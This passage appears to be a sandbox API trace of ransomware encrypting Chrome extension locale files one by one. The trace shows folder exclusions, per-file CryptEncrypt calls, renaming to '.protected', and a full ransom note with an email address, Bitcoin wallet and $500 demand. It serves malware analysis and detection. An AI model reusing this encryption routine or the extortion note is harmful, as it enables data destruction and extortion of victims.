Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json") returned 157 [0079.737] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.737] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.737] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.737] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.737] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.738] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.738] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.738] CloseHandle (hObject=0x168) returned 1 [0079.738] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.protected") returned 167 [0079.738] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\messages.json.protected")) returned 1 [0079.738] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.738] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.738] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\RESTORE_FILES.txt") returned 161 [0079.738] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.739] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.739] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.740] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.740] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.740] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.740] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.740] CloseHandle (hObject=0x164) returned 1 [0079.740] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.740] lstrcmpiW (lpString1="es", lpString2="Windows") returned -1 [0079.740] lstrcmpiW (lpString1="es", lpString2="Program Files") returned -1 [0079.740] lstrcmpiW (lpString1="es", lpString2="Program Files (x86)") returned -1 [0079.740] lstrcmpiW (lpString1="es", lpString2="$Recycle.bin") returned 1 [0079.740] lstrcmpiW (lpString1="es", lpString2="System Volume Information") returned -1 [0079.740] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es") returned 143 [0079.740] lstrcmpW (lpString1="es", lpString2=".") returned 1 [0079.740] lstrcmpW (lpString1="es", lpString2="..") returned 1 [0079.740] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\*") returned 145 [0079.740] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.740] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.740] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.741] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.741] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.741] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.741] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\.") returned 145 [0079.741] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.741] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.741] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.741] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.741] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.741] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.741] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.741] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\..") returned 146 [0079.741] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.741] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.741] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.741] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.741] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json") returned 157 [0079.741] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.741] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.741] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.741] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.741] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json") returned 157 [0079.742] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json") returned 157 [0079.742] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.742] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json") returned 157 [0079.742] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.742] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.743] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.743] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.743] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.743] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.743] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.743] CloseHandle (hObject=0x168) returned 1 [0079.743] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.protected") returned 167 [0079.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\messages.json.protected")) returned 1 [0079.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.744] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\RESTORE_FILES.txt") returned 161 [0079.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.745] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.745] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.746] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.746] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.746] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.746] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.746] CloseHandle (hObject=0x164) returned 1 [0079.746] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="Windows") returned -1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="Program Files") returned -1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="Program Files (x86)") returned -1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="$Recycle.bin") returned 1 [0079.746] lstrcmpiW (lpString1="fi", lpString2="System Volume Information") returned -1 [0079.746] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi") returned 143 [0079.746] lstrcmpW (lpString1="fi", lpString2=".") returned 1 [0079.746] lstrcmpW (lpString1="fi", lpString2="..") returned 1 [0079.746] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\*") returned 145 [0079.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.747] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.747] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.747] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.747] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.747] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\.") returned 145 [0079.747] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.747] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.747] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.747] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.747] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.747] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.747] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\..") returned 146 [0079.748] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.748] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.748] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.748] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.748] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json") returned 157 [0079.748] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.748] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.748] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.748] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.748] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json") returned 157 [0079.748] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json") returned 157 [0079.748] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.748] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\fi\\messages.json") returned 157 [0079.748] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.748] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, 